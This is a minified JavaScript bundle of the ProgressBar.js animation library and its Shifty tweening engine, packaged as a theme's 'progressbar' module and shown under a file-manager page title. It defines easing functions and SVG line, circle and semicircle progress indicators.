Sindbad~EG File Manager
!function(f){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=f();else if("function"==typeof define&&define.amd)define("theme_snap/progressbar",[],f);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).ProgressBar=f()}}((function(){return function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a="function"==typeof require&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,(function(e){var n=t[o][1][e];return s(n||e)}),l,l.exports,e,t,n,r)}return n[o].exports}for(var i="function"==typeof require&&require,o=0;o<r.length;o++)s(r[o]);return s}({1:[function(require,module,exports){(function(){var mockTweenable,root=this||Function("return this")(),Tweenable=function(){var formula,DEFAULT_SCHEDULE_FUNCTION,timeoutHandler_endTime,timeoutHandler_currentTime,timeoutHandler_isEnded,timeoutHandler_offset,_now=Date.now?Date.now:function(){return+new Date},now="undefined"!=typeof SHIFTY_DEBUG_NOW?SHIFTY_DEBUG_NOW:_now;function noop(){}function each(obj,fn){var key;for(key in obj)Object.hasOwnProperty.call(obj,key)&&fn(key)}function shallowCopy(targetObj,srcObj){return each(srcObj,(function(prop){targetObj[prop]=srcObj[prop]})),targetObj}function defaults(target,src){each(src,(function(prop){void 0===target[prop]&&(target[prop]=src[prop])}))}function tweenProps(forPosition,currentState,originalState,targetState,duration,timestamp,easing){var prop,easingObjectProp,easingFn,normalizedPosition=forPosition<timestamp?0:(forPosition-timestamp)/duration;for(prop in currentState)currentState.hasOwnProperty(prop)&&(easingFn="function"==typeof(easingObjectProp=easing[prop])?easingObjectProp:formula[easingObjectProp],currentState[prop]=tweenProp(originalState[prop],targetState[prop],easingFn,normalizedPosition));return currentState}function tweenProp(start,end,easingFunc,position){return start+(end-start)*easingFunc(position)}function applyFilter(tweenable,filterName){var filters=Tweenable.prototype.filter,args=tweenable._filterArgs;each(filters,(function(name){void 0!==filters[name][filterName]&&filters[name][filterName].apply(tweenable,args)}))}function timeoutHandler(tweenable,timestamp,delay,duration,currentState,originalState,targetState,easing,step,schedule,opt_currentTimeOverride){timeoutHandler_endTime=timestamp+delay+duration,timeoutHandler_currentTime=Math.min(opt_currentTimeOverride||now(),timeoutHandler_endTime),timeoutHandler_isEnded=timeoutHandler_currentTime>=timeoutHandler_endTime,timeoutHandler_offset=duration-(timeoutHandler_endTime-timeoutHandler_currentTime),tweenable.isPlaying()&&(timeoutHandler_isEnded?(step(targetState,tweenable._attachment,timeoutHandler_offset),tweenable.stop(!0)):(tweenable._scheduleId=schedule(tweenable._timeoutHandler,16.666666666666668),applyFilter(tweenable,"beforeTween"),timeoutHandler_currentTime<timestamp+delay?tweenProps(1,currentState,originalState,targetState,1,1,easing):tweenProps(timeoutHandler_currentTime,currentState,originalState,targetState,duration,timestamp+delay,easing),applyFilter(tweenable,"afterTween"),step(currentState,tweenable._attachment,timeoutHandler_offset)))}function composeEasingObject(fromTweenParams,easing){var composedEasing={},typeofEasing=typeof easing;return each(fromTweenParams,"string"===typeofEasing||"function"===typeofEasing?function(prop){composedEasing[prop]=easing}:function(prop){composedEasing[prop]||(composedEasing[prop]=easing[prop]||"linear")}),composedEasing}function Tweenable(opt_initialState,opt_config){this._currentState=opt_initialState||{},this._configured=!1,this._scheduleFunction=DEFAULT_SCHEDULE_FUNCTION,void 0!==opt_config&&this.setConfig(opt_config)}return DEFAULT_SCHEDULE_FUNCTION="undefined"!=typeof window&&(window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||window.mozCancelRequestAnimationFrame&&window.mozRequestAnimationFrame)||setTimeout,Tweenable.prototype.tween=function(opt_config){return this._isTweening?this:(void 0===opt_config&&this._configured||this.setConfig(opt_config),this._timestamp=now(),this._start(this.get(),this._attachment),this.resume())},Tweenable.prototype.setConfig=function(config){config=config||{},this._configured=!0,this._attachment=config.attachment,this._pausedAtTime=null,this._scheduleId=null,this._delay=config.delay||0,this._start=config.start||noop,this._step=config.step||noop,this._finish=config.finish||noop,this._duration=config.duration||500,this._currentState=shallowCopy({},config.from)||this.get(),this._originalState=this.get(),this._targetState=shallowCopy({},config.to)||this.get();var self=this;this._timeoutHandler=function(){timeoutHandler(self,self._timestamp,self._delay,self._duration,self._currentState,self._originalState,self._targetState,self._easing,self._step,self._scheduleFunction)};var currentState=this._currentState,targetState=this._targetState;return defaults(targetState,currentState),this._easing=composeEasingObject(currentState,config.easing||"linear"),this._filterArgs=[currentState,this._originalState,targetState,this._easing],applyFilter(this,"tweenCreated"),this},Tweenable.prototype.get=function(){return shallowCopy({},this._currentState)},Tweenable.prototype.set=function(state){this._currentState=state},Tweenable.prototype.pause=function(){return this._pausedAtTime=now(),this._isPaused=!0,this},Tweenable.prototype.resume=function(){return this._isPaused&&(this._timestamp+=now()-this._pausedAtTime),this._isPaused=!1,this._isTweening=!0,this._timeoutHandler(),this},Tweenable.prototype.seek=function(millisecond){millisecond=Math.max(millisecond,0);var currentTime=now();return this._timestamp+millisecond===0||(this._timestamp=currentTime-millisecond,this.isPlaying()||(this._isTweening=!0,this._isPaused=!1,timeoutHandler(this,this._timestamp,this._delay,this._duration,this._currentState,this._originalState,this._targetState,this._easing,this._step,this._scheduleFunction,currentTime),this.pause())),this},Tweenable.prototype.stop=function(gotoEnd){return this._isTweening=!1,this._isPaused=!1,this._timeoutHandler=noop,(root.cancelAnimationFrame||root.webkitCancelAnimationFrame||root.oCancelAnimationFrame||root.msCancelAnimationFrame||root.mozCancelRequestAnimationFrame||root.clearTimeout)(this._scheduleId),gotoEnd&&(applyFilter(this,"beforeTween"),tweenProps(1,this._currentState,this._originalState,this._targetState,1,0,this._easing),applyFilter(this,"afterTween"),applyFilter(this,"afterTweenEnd"),this._finish.call(this,this._currentState,this._attachment)),this},Tweenable.prototype.isPlaying=function(){return this._isTweening&&!this._isPaused},Tweenable.prototype.setScheduleFunction=function(scheduleFunction){this._scheduleFunction=scheduleFunction},Tweenable.prototype.dispose=function(){var prop;for(prop in this)this.hasOwnProperty(prop)&&delete this[prop]},Tweenable.prototype.filter={},Tweenable.prototype.formula={linear:function(pos){return pos}},formula=Tweenable.prototype.formula,shallowCopy(Tweenable,{now:now,each:each,tweenProps:tweenProps,tweenProp:tweenProp,applyFilter:applyFilter,shallowCopy:shallowCopy,defaults:defaults,composeEasingObject:composeEasingObject}),"function"==typeof SHIFTY_DEBUG_NOW&&(root.timeoutHandler=timeoutHandler),"object"==typeof exports?module.exports=Tweenable:void 0===root.Tweenable&&(root.Tweenable=Tweenable),Tweenable}();Tweenable.shallowCopy(Tweenable.prototype.formula,{easeInQuad:function(pos){return Math.pow(pos,2)},easeOutQuad:function(pos){return-(Math.pow(pos-1,2)-1)},easeInOutQuad:function(pos){return(pos/=.5)<1?.5*Math.pow(pos,2):-.5*((pos-=2)*pos-2)},easeInCubic:function(pos){return Math.pow(pos,3)},easeOutCubic:function(pos){return Math.pow(pos-1,3)+1},easeInOutCubic:function(pos){return(pos/=.5)<1?.5*Math.pow(pos,3):.5*(Math.pow(pos-2,3)+2)},easeInQuart:function(pos){return Math.pow(pos,4)},easeOutQuart:function(pos){return-(Math.pow(pos-1,4)-1)},easeInOutQuart:function(pos){return(pos/=.5)<1?.5*Math.pow(pos,4):-.5*((pos-=2)*Math.pow(pos,3)-2)},easeInQuint:function(pos){return Math.pow(pos,5)},easeOutQuint:function(pos){return Math.pow(pos-1,5)+1},easeInOutQuint:function(pos){return(pos/=.5)<1?.5*Math.pow(pos,5):.5*(Math.pow(pos-2,5)+2)},easeInSine:function(pos){return 1-Math.cos(pos*(Math.PI/2))},easeOutSine:function(pos){return Math.sin(pos*(Math.PI/2))},easeInOutSine:function(pos){return-.5*(Math.cos(Math.PI*pos)-1)},easeInExpo:function(pos){return 0===pos?0:Math.pow(2,10*(pos-1))},easeOutExpo:function(pos){return 1===pos?1:1-Math.pow(2,-10*pos)},easeInOutExpo:function(pos){return 0===pos?0:1===pos?1:(pos/=.5)<1?.5*Math.pow(2,10*(pos-1)):.5*(2-Math.pow(2,-10*--pos))},easeInCirc:function(pos){return-(Math.sqrt(1-pos*pos)-1)},easeOutCirc:function(pos){return Math.sqrt(1-Math.pow(pos-1,2))},easeInOutCirc:function(pos){return(pos/=.5)<1?-.5*(Math.sqrt(1-pos*pos)-1):.5*(Math.sqrt(1-(pos-=2)*pos)+1)},easeOutBounce:function(pos){return pos<1/2.75?7.5625*pos*pos:pos<2/2.75?7.5625*(pos-=1.5/2.75)*pos+.75:pos<2.5/2.75?7.5625*(pos-=2.25/2.75)*pos+.9375:7.5625*(pos-=2.625/2.75)*pos+.984375},easeInBack:function(pos){var s=1.70158;return pos*pos*((s+1)*pos-s)},easeOutBack:function(pos){var s=1.70158;return(pos-=1)*pos*((s+1)*pos+s)+1},easeInOutBack:function(pos){var s=1.70158;return(pos/=.5)<1?pos*pos*((1+(s*=1.525))*pos-s)*.5:.5*((pos-=2)*pos*((1+(s*=1.525))*pos+s)+2)},elastic:function(pos){return-1*Math.pow(4,-8*pos)*Math.sin((6*pos-1)*(2*Math.PI)/2)+1},swingFromTo:function(pos){var s=1.70158;return(pos/=.5)<1?pos*pos*((1+(s*=1.525))*pos-s)*.5:.5*((pos-=2)*pos*((1+(s*=1.525))*pos+s)+2)},swingFrom:function(pos){var s=1.70158;return pos*pos*((s+1)*pos-s)},swingTo:function(pos){var s=1.70158;return(pos-=1)*pos*((s+1)*pos+s)+1},bounce:function(pos){return pos<1/2.75?7.5625*pos*pos:pos<2/2.75?7.5625*(pos-=1.5/2.75)*pos+.75:pos<2.5/2.75?7.5625*(pos-=2.25/2.75)*pos+.9375:7.5625*(pos-=2.625/2.75)*pos+.984375},bouncePast:function(pos){return pos<1/2.75?7.5625*pos*pos:pos<2/2.75?2-(7.5625*(pos-=1.5/2.75)*pos+.75):pos<2.5/2.75?2-(7.5625*(pos-=2.25/2.75)*pos+.9375):2-(7.5625*(pos-=2.625/2.75)*pos+.984375)},easeFromTo:function(pos){return(pos/=.5)<1?.5*Math.pow(pos,4):-.5*((pos-=2)*Math.pow(pos,3)-2)},easeFrom:function(pos){return Math.pow(pos,4)},easeTo:function(pos){return Math.pow(pos,.25)}}),function(){function cubicBezierAtTime(t,p1x,p1y,p2x,p2y,duration){var x,epsilon,ax=0,bx=0,cx=0,ay=0,by=0,cy=0;function sampleCurveX(t){return((ax*t+bx)*t+cx)*t}function sampleCurveDerivativeX(t){return(3*ax*t+2*bx)*t+cx}function fabs(n){return n>=0?n:0-n}return ax=1-(cx=3*p1x)-(bx=3*(p2x-p1x)-cx),ay=1-(cy=3*p1y)-(by=3*(p2y-p1y)-cy),x=t,epsilon=function(duration){return 1/(200*duration)}(duration),function(t){return((ay*t+by)*t+cy)*t}(function(x,epsilon){var t0,t1,t2,x2,d2,i;for(t2=x,i=0;i<8;i++){if(fabs(x2=sampleCurveX(t2)-x)<epsilon)return t2;if(fabs(d2=sampleCurveDerivativeX(t2))<1e-6)break;t2-=x2/d2}if(t1=1,(t2=x)<(t0=0))return t0;if(t2>t1)return t1;for(;t0<t1;){if(fabs((x2=sampleCurveX(t2))-x)<epsilon)return t2;x>x2?t0=t2:t1=t2,t2=.5*(t1-t0)+t0}return t2}(x,epsilon))}Tweenable.setBezierFunction=function(name,x1,y1,x2,y2){var cubicBezierTransition=function(x1,y1,x2,y2){return function(pos){return cubicBezierAtTime(pos,x1,y1,x2,y2,1)}}(x1,y1,x2,y2);return cubicBezierTransition.displayName=name,cubicBezierTransition.x1=x1,cubicBezierTransition.y1=y1,cubicBezierTransition.x2=x2,cubicBezierTransition.y2=y2,Tweenable.prototype.formula[name]=cubicBezierTransition},Tweenable.unsetBezierFunction=function(name){delete Tweenable.prototype.formula[name]}}(),(mockTweenable=new Tweenable)._filterArgs=[],Tweenable.interpolate=function(from,targetState,position,easing,opt_delay){var current=Tweenable.shallowCopy({},from),delay=opt_delay||0,easingObject=Tweenable.composeEasingObject(from,easing||"linear");mockTweenable.set({});var filterArgs=mockTweenable._filterArgs;filterArgs.length=0,filterArgs[0]=current,filterArgs[1]=from,filterArgs[2]=targetState,filterArgs[3]=easingObject,Tweenable.applyFilter(mockTweenable,"tweenCreated"),Tweenable.applyFilter(mockTweenable,"beforeTween");var interpolatedValues=function(from,current,targetState,position,easing,delay){return Tweenable.tweenProps(position,current,from,targetState,1,delay,easing)}(from,current,targetState,position,easingObject,delay);return Tweenable.applyFilter(mockTweenable,"afterTween"),interpolatedValues},function(Tweenable){var R_NUMBER_COMPONENT=/(\d|\-|\.)/,R_FORMAT_CHUNKS=/([^\-0-9\.]+)/g,R_UNFORMATTED_VALUES=/[0-9.\-]+/g,R_RGB=new RegExp("rgb\\("+R_UNFORMATTED_VALUES.source+/,\s*/.source+R_UNFORMATTED_VALUES.source+/,\s*/.source+R_UNFORMATTED_VALUES.source+"\\)","g"),R_RGB_PREFIX=/^.*\(/,R_HEX=/#([0-9]|[a-f]){3,6}/gi;function getFormatChunksFrom(rawValues,prefix){var i,accumulator=[],rawValuesLength=rawValues.length;for(i=0;i<rawValuesLength;i++)accumulator.push("_"+prefix+"_"+i);return accumulator}function sanitizeObjectForHexProps(stateObject){Tweenable.each(stateObject,(function(prop){var currentProp=stateObject[prop];"string"==typeof currentProp&¤tProp.match(R_HEX)&&(stateObject[prop]=filterStringChunks(R_HEX,currentProp,convertHexToRGB))}))}function convertHexToRGB(hexString){var rgbArr=function(hex){3===(hex=hex.replace(/#/,"")).length&&(hex=(hex=hex.split(""))[0]+hex[0]+hex[1]+hex[1]+hex[2]+hex[2]);return hexToRGBArray_returnArray[0]=hexToDec(hex.substr(0,2)),hexToRGBArray_returnArray[1]=hexToDec(hex.substr(2,2)),hexToRGBArray_returnArray[2]=hexToDec(hex.substr(4,2)),hexToRGBArray_returnArray}(hexString);return"rgb("+rgbArr[0]+","+rgbArr[1]+","+rgbArr[2]+")"}var hexToRGBArray_returnArray=[];function hexToDec(hex){return parseInt(hex,16)}function filterStringChunks(pattern,unfilteredString,filter){var pattenMatches=unfilteredString.match(pattern),filteredString=unfilteredString.replace(pattern,"VAL");if(pattenMatches)for(var currentChunk,pattenMatchesLength=pattenMatches.length,i=0;i<pattenMatchesLength;i++)currentChunk=pattenMatches.shift(),filteredString=filteredString.replace("VAL",filter(currentChunk));return filteredString}function sanitizeRGBChunk(rgbChunk){for(var numbers=rgbChunk.match(R_UNFORMATTED_VALUES),numbersLength=numbers.length,sanitizedString=rgbChunk.match(R_RGB_PREFIX)[0],i=0;i<numbersLength;i++)sanitizedString+=parseInt(numbers[i],10)+",";return sanitizedString=sanitizedString.slice(0,-1)+")"}function expandFormattedProperties(stateObject,formatManifests){Tweenable.each(formatManifests,(function(prop){for(var rawValues=getValuesFrom(stateObject[prop]),rawValuesLength=rawValues.length,i=0;i<rawValuesLength;i++)stateObject[formatManifests[prop].chunkNames[i]]=+rawValues[i];delete stateObject[prop]}))}function collapseFormattedProperties(stateObject,formatManifests){Tweenable.each(formatManifests,(function(prop){var currentProp=stateObject[prop],formatChunks=function(stateObject,chunkNames){for(var currentChunkName,extractedValues={},chunkNamesLength=chunkNames.length,i=0;i<chunkNamesLength;i++)extractedValues[currentChunkName=chunkNames[i]]=stateObject[currentChunkName],delete stateObject[currentChunkName];return extractedValues}(stateObject,formatManifests[prop].chunkNames),valuesList=function(stateObject,chunkNames){getValuesList_accumulator.length=0;for(var chunkNamesLength=chunkNames.length,i=0;i<chunkNamesLength;i++)getValuesList_accumulator.push(stateObject[chunkNames[i]]);return getValuesList_accumulator}(formatChunks,formatManifests[prop].chunkNames);currentProp=function(formatString,rawValues){for(var formattedValueString=formatString,rawValuesLength=rawValues.length,i=0;i<rawValuesLength;i++)formattedValueString=formattedValueString.replace("VAL",+rawValues[i].toFixed(4));return formattedValueString}(formatManifests[prop].formatString,valuesList),stateObject[prop]=filterStringChunks(R_RGB,currentProp,sanitizeRGBChunk)}))}var getValuesList_accumulator=[];function getValuesFrom(formattedString){return formattedString.match(R_UNFORMATTED_VALUES)}Tweenable.prototype.filter.token={tweenCreated:function(currentState,fromState,toState,easingObject){var stateObject,manifestAccumulator;sanitizeObjectForHexProps(currentState),sanitizeObjectForHexProps(fromState),sanitizeObjectForHexProps(toState),this._tokenData=(stateObject=currentState,manifestAccumulator={},Tweenable.each(stateObject,(function(prop){var formattedString,chunks,currentProp=stateObject[prop];if("string"==typeof currentProp){var rawValues=getValuesFrom(currentProp);manifestAccumulator[prop]={formatString:(formattedString=currentProp,chunks=formattedString.match(R_FORMAT_CHUNKS),chunks?(1===chunks.length||formattedString[0].match(R_NUMBER_COMPONENT))&&chunks.unshift(""):chunks=["",""],chunks.join("VAL")),chunkNames:getFormatChunksFrom(rawValues,prop)}}})),manifestAccumulator)},beforeTween:function(currentState,fromState,toState,easingObject){!function(easingObject,tokenData){Tweenable.each(tokenData,(function(prop){var i,chunkNames=tokenData[prop].chunkNames,chunkLength=chunkNames.length,easing=easingObject[prop];if("string"==typeof easing){var easingChunks=easing.split(" "),lastEasingChunk=easingChunks[easingChunks.length-1];for(i=0;i<chunkLength;i++)easingObject[chunkNames[i]]=easingChunks[i]||lastEasingChunk}else for(i=0;i<chunkLength;i++)easingObject[chunkNames[i]]=easing;delete easingObject[prop]}))}(easingObject,this._tokenData),expandFormattedProperties(currentState,this._tokenData),expandFormattedProperties(fromState,this._tokenData),expandFormattedProperties(toState,this._tokenData)},afterTween:function(currentState,fromState,toState,easingObject){collapseFormattedProperties(currentState,this._tokenData),collapseFormattedProperties(fromState,this._tokenData),collapseFormattedProperties(toState,this._tokenData),function(easingObject,tokenData){Tweenable.each(tokenData,(function(prop){var chunkNames=tokenData[prop].chunkNames,chunkLength=chunkNames.length,firstEasing=easingObject[chunkNames[0]];if("string"==typeof firstEasing){for(var composedEasingString="",i=0;i<chunkLength;i++)composedEasingString+=" "+easingObject[chunkNames[i]],delete easingObject[chunkNames[i]];easingObject[prop]=composedEasingString.substr(1)}else easingObject[prop]=firstEasing}))}(easingObject,this._tokenData)}}}(Tweenable)}).call(null)},{}],2:[function(require,module,exports){var Shape=require("./shape"),utils=require("./utils"),Circle=function(container,options){this._pathTemplate="M 50,50 m 0,-{radius} a {radius},{radius} 0 1 1 0,{2radius} a {radius},{radius} 0 1 1 0,-{2radius}",this.containerAspectRatio=1,Shape.apply(this,arguments)};(Circle.prototype=new Shape).constructor=Circle,Circle.prototype._pathString=function(opts){var widthOfWider=opts.strokeWidth;opts.trailWidth&&opts.trailWidth>opts.strokeWidth&&(widthOfWider=opts.trailWidth);var r=50-widthOfWider/2;return utils.render(this._pathTemplate,{radius:r,"2radius":2*r})},Circle.prototype._trailString=function(opts){return this._pathString(opts)},module.exports=Circle},{"./shape":7,"./utils":8}],3:[function(require,module,exports){var Shape=require("./shape"),utils=require("./utils"),Line=function(container,options){this._pathTemplate="M 0,{center} L 100,{center}",Shape.apply(this,arguments)};(Line.prototype=new Shape).constructor=Line,Line.prototype._initializeSvg=function(svg,opts){svg.setAttribute("viewBox","0 0 100 "+opts.strokeWidth),svg.setAttribute("preserveAspectRatio","none")},Line.prototype._pathString=function(opts){return utils.render(this._pathTemplate,{center:opts.strokeWidth/2})},Line.prototype._trailString=function(opts){return this._pathString(opts)},module.exports=Line},{"./shape":7,"./utils":8}],4:[function(require,module,exports){module.exports={Line:require("./line"),Circle:require("./circle"),SemiCircle:require("./semicircle"),Path:require("./path"),Shape:require("./shape"),utils:require("./utils")}},{"./circle":2,"./line":3,"./path":5,"./semicircle":6,"./shape":7,"./utils":8}],5:[function(require,module,exports){var Tweenable=require("shifty"),utils=require("./utils"),EASING_ALIASES={easeIn:"easeInCubic",easeOut:"easeOutCubic",easeInOut:"easeInOutCubic"},Path=function Path(path,opts){if(!(this instanceof Path))throw new Error("Constructor was called without new keyword");var element;opts=utils.extend({duration:800,easing:"linear",from:{},to:{},step:function(){}},opts),element=utils.isString(path)?document.querySelector(path):path,this.path=element,this._opts=opts,this._tweenable=null;var length=this.path.getTotalLength();this.path.style.strokeDasharray=length+" "+length,this.set(0)};Path.prototype.value=function(){var offset=this._getComputedDashOffset(),length=this.path.getTotalLength();return parseFloat((1-offset/length).toFixed(6),10)},Path.prototype.set=function(progress){this.stop(),this.path.style.strokeDashoffset=this._progressToOffset(progress);var step=this._opts.step;if(utils.isFunction(step)){var easing=this._easing(this._opts.easing);step(this._calculateTo(progress,easing),this._opts.shape||this,this._opts.attachment)}},Path.prototype.stop=function(){this._stopTween(),this.path.style.strokeDashoffset=this._getComputedDashOffset()},Path.prototype.animate=function(progress,opts,cb){opts=opts||{},utils.isFunction(opts)&&(cb=opts,opts={});var passedOpts=utils.extend({},opts),defaultOpts=utils.extend({},this._opts);opts=utils.extend(defaultOpts,opts);var shiftyEasing=this._easing(opts.easing),values=this._resolveFromAndTo(progress,shiftyEasing,passedOpts);this.stop(),this.path.getBoundingClientRect();var offset=this._getComputedDashOffset(),newOffset=this._progressToOffset(progress),self=this;this._tweenable=new Tweenable,this._tweenable.tween({from:utils.extend({offset:offset},values.from),to:utils.extend({offset:newOffset},values.to),duration:opts.duration,easing:shiftyEasing,step:function(state){self.path.style.strokeDashoffset=state.offset;var reference=opts.shape||self;opts.step(state,reference,opts.attachment)},finish:function(state){utils.isFunction(cb)&&cb()}})},Path.prototype._getComputedDashOffset=function(){var computedStyle=window.getComputedStyle(this.path,null);return parseFloat(computedStyle.getPropertyValue("stroke-dashoffset"),10)},Path.prototype._progressToOffset=function(progress){var length=this.path.getTotalLength();return length-progress*length},Path.prototype._resolveFromAndTo=function(progress,easing,opts){return opts.from&&opts.to?{from:opts.from,to:opts.to}:{from:this._calculateFrom(easing),to:this._calculateTo(progress,easing)}},Path.prototype._calculateFrom=function(easing){return Tweenable.interpolate(this._opts.from,this._opts.to,this.value(),easing)},Path.prototype._calculateTo=function(progress,easing){return Tweenable.interpolate(this._opts.from,this._opts.to,progress,easing)},Path.prototype._stopTween=function(){null!==this._tweenable&&(this._tweenable.stop(),this._tweenable=null)},Path.prototype._easing=function(easing){return EASING_ALIASES.hasOwnProperty(easing)?EASING_ALIASES[easing]:easing},module.exports=Path},{"./utils":8,shifty:1}],6:[function(require,module,exports){var Shape=require("./shape"),Circle=require("./circle"),utils=require("./utils"),SemiCircle=function(container,options){this._pathTemplate="M 50,50 m -{radius},0 a {radius},{radius} 0 1 1 {2radius},0",this.containerAspectRatio=2,Shape.apply(this,arguments)};(SemiCircle.prototype=new Shape).constructor=SemiCircle,SemiCircle.prototype._initializeSvg=function(svg,opts){svg.setAttribute("viewBox","0 0 100 50")},SemiCircle.prototype._initializeTextContainer=function(opts,container,textContainer){opts.text.style&&(textContainer.style.top="auto",textContainer.style.bottom="0",opts.text.alignToBottom?utils.setStyle(textContainer,"transform","translate(-50%, 0)"):utils.setStyle(textContainer,"transform","translate(-50%, 50%)"))},SemiCircle.prototype._pathString=Circle.prototype._pathString,SemiCircle.prototype._trailString=Circle.prototype._trailString,module.exports=SemiCircle},{"./circle":2,"./shape":7,"./utils":8}],7:[function(require,module,exports){var Path=require("./path"),utils=require("./utils"),Shape=function Shape(container,opts){if(!(this instanceof Shape))throw new Error("Constructor was called without new keyword");if(0!==arguments.length){this._opts=utils.extend({color:"#555",strokeWidth:1,trailColor:null,trailWidth:null,fill:null,text:{style:{color:null,position:"absolute",left:"50%",top:"50%",padding:0,margin:0,transform:{prefix:!0,value:"translate(-50%, -50%)"}},autoStyleContainer:!0,alignToBottom:!0,value:null,className:"progressbar-text"},svgStyle:{display:"block",width:"100%"},warnings:!1},opts,!0),utils.isObject(opts)&&void 0!==opts.svgStyle&&(this._opts.svgStyle=opts.svgStyle),utils.isObject(opts)&&utils.isObject(opts.text)&&void 0!==opts.text.style&&(this._opts.text.style=opts.text.style);var element,svgView=this._createSvgView(this._opts);if(!(element=utils.isString(container)?document.querySelector(container):container))throw new Error("Container does not exist: "+container);this._container=element,this._container.appendChild(svgView.svg),this._opts.warnings&&this._warnContainerAspectRatio(this._container),this._opts.svgStyle&&utils.setStyles(svgView.svg,this._opts.svgStyle),this.svg=svgView.svg,this.path=svgView.path,this.trail=svgView.trail,this.text=null;var newOpts=utils.extend({attachment:void 0,shape:this},this._opts);this._progressPath=new Path(svgView.path,newOpts),utils.isObject(this._opts.text)&&null!==this._opts.text.value&&this.setText(this._opts.text.value)}};Shape.prototype.animate=function(progress,opts,cb){if(null===this._progressPath)throw new Error("Object is destroyed");this._progressPath.animate(progress,opts,cb)},Shape.prototype.stop=function(){if(null===this._progressPath)throw new Error("Object is destroyed");void 0!==this._progressPath&&this._progressPath.stop()},Shape.prototype.destroy=function(){if(null===this._progressPath)throw new Error("Object is destroyed");this.stop(),this.svg.parentNode.removeChild(this.svg),this.svg=null,this.path=null,this.trail=null,this._progressPath=null,null!==this.text&&(this.text.parentNode.removeChild(this.text),this.text=null)},Shape.prototype.set=function(progress){if(null===this._progressPath)throw new Error("Object is destroyed");this._progressPath.set(progress)},Shape.prototype.value=function(){if(null===this._progressPath)throw new Error("Object is destroyed");return void 0===this._progressPath?0:this._progressPath.value()},Shape.prototype.setText=function(newText){if(null===this._progressPath)throw new Error("Object is destroyed");null===this.text&&(this.text=this._createTextContainer(this._opts,this._container),this._container.appendChild(this.text)),utils.isObject(newText)?(utils.removeChildren(this.text),this.text.appendChild(newText)):this.text.innerHTML=newText},Shape.prototype._createSvgView=function(opts){var svg=document.createElementNS("http://www.w3.org/2000/svg","svg");this._initializeSvg(svg,opts);var trailPath=null;(opts.trailColor||opts.trailWidth)&&(trailPath=this._createTrail(opts),svg.appendChild(trailPath));var path=this._createPath(opts);return svg.appendChild(path),{svg:svg,path:path,trail:trailPath}},Shape.prototype._initializeSvg=function(svg,opts){svg.setAttribute("viewBox","0 0 100 100")},Shape.prototype._createPath=function(opts){var pathString=this._pathString(opts);return this._createPathElement(pathString,opts)},Shape.prototype._createTrail=function(opts){var pathString=this._trailString(opts),newOpts=utils.extend({},opts);return newOpts.trailColor||(newOpts.trailColor="#eee"),newOpts.trailWidth||(newOpts.trailWidth=newOpts.strokeWidth),newOpts.color=newOpts.trailColor,newOpts.strokeWidth=newOpts.trailWidth,newOpts.fill=null,this._createPathElement(pathString,newOpts)},Shape.prototype._createPathElement=function(pathString,opts){var path=document.createElementNS("http://www.w3.org/2000/svg","path");return path.setAttribute("d",pathString),path.setAttribute("stroke",opts.color),path.setAttribute("stroke-width",opts.strokeWidth),opts.fill?path.setAttribute("fill",opts.fill):path.setAttribute("fill-opacity","0"),path},Shape.prototype._createTextContainer=function(opts,container){var textContainer=document.createElement("div");textContainer.className=opts.text.className;var textStyle=opts.text.style;return textStyle&&(opts.text.autoStyleContainer&&(container.style.position="relative"),utils.setStyles(textContainer,textStyle),textStyle.color||(textContainer.style.color=opts.color)),this._initializeTextContainer(opts,container,textContainer),textContainer},Shape.prototype._initializeTextContainer=function(opts,container,element){},Shape.prototype._pathString=function(opts){throw new Error("Override this function for each progress bar")},Shape.prototype._trailString=function(opts){throw new Error("Override this function for each progress bar")},Shape.prototype._warnContainerAspectRatio=function(container){if(this.containerAspectRatio){var computedStyle=window.getComputedStyle(container,null),width=parseFloat(computedStyle.getPropertyValue("width"),10),height=parseFloat(computedStyle.getPropertyValue("height"),10);utils.floatEquals(this.containerAspectRatio,width/height)||(console.warn("Incorrect aspect ratio of container","#"+container.id,"detected:",computedStyle.getPropertyValue("width")+"(width)","/",computedStyle.getPropertyValue("height")+"(height)","=",width/height),console.warn("Aspect ratio of should be",this.containerAspectRatio))}},module.exports=Shape},{"./path":5,"./utils":8}],8:[function(require,module,exports){var PREFIXES="Webkit Moz O ms".split(" ");function setStyle(element,style,value){for(var elStyle=element.style,i=0;i<PREFIXES.length;++i){elStyle[PREFIXES[i]+capitalize(style)]=value}elStyle[style]=value}function capitalize(text){return text.charAt(0).toUpperCase()+text.slice(1)}function isObject(obj){return!function(obj){return"[object Array]"===Object.prototype.toString.call(obj)}(obj)&&("object"===typeof obj&&!!obj)}function forEachObject(object,callback){for(var key in object){if(object.hasOwnProperty(key))callback(object[key],key)}}module.exports={extend:function extend(destination,source,recursive){for(var attrName in destination=destination||{},recursive=recursive||!1,source=source||{})if(source.hasOwnProperty(attrName)){var destVal=destination[attrName],sourceVal=source[attrName];recursive&&isObject(destVal)&&isObject(sourceVal)?destination[attrName]=extend(destVal,sourceVal,recursive):destination[attrName]=sourceVal}return destination},render:function(template,vars){var rendered=template;for(var key in vars)if(vars.hasOwnProperty(key)){var val=vars[key],regExp=new RegExp("\\{"+key+"\\}","g");rendered=rendered.replace(regExp,val)}return rendered},setStyle:setStyle,setStyles:function(element,styles){forEachObject(styles,(function(styleValue,styleName){null!=styleValue&&(isObject(styleValue)&&!0===styleValue.prefix?setStyle(element,styleName,styleValue.value):element.style[styleName]=styleValue)}))},capitalize:capitalize,isString:function(obj){return"string"==typeof obj||obj instanceof String},isFunction:function(obj){return"function"==typeof obj},isObject:isObject,forEachObject:forEachObject,floatEquals:function(a,b){return Math.abs(a-b)<.001},removeChildren:function(el){for(;el.firstChild;)el.removeChild(el.firstChild)}}},{}]},{},[4])(4)}));
